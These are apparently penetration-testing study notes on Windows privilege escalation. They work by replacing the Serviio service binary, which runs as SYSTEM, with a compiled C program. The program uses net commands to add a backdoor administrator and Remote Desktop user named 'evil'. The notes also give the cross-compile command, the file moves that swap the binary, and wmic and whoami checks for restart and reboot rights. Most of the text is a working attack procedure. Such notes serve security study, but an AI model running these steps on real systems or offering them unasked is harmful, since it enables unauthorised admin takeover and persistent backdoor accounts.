Another way to elevate privileges on a Windows system is to exploit insecure file permissions on services that run as nt authority\system. Example: Serviio service
<aside> 👨💻 #include <stdlib.h>
int main () { int i;
i = system ("net user evil password /add"); i = system ("net localgroup administrators evil /add");
i = system ("net localgroup 'Remote Desktop Users' evil /add");
return 0; }
</aside>
Compile adduser.c in linux i686-w64-mingw32-gcc adduser.c -o adduser.exe
replace the original ServiioService.exe binary with our malicious copy: move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe”
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe”
dir "C:\Program Files\Serviio\bin\”
Restart the service net stop Serviio But most of the time current user don’t have permission to restart service . But service may be set to “Auto” restart after system reboot. To check the same wmic service where caption="Serviio" get name, caption, state, startmode
Check if current user has permission to reboot whoami /priv
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled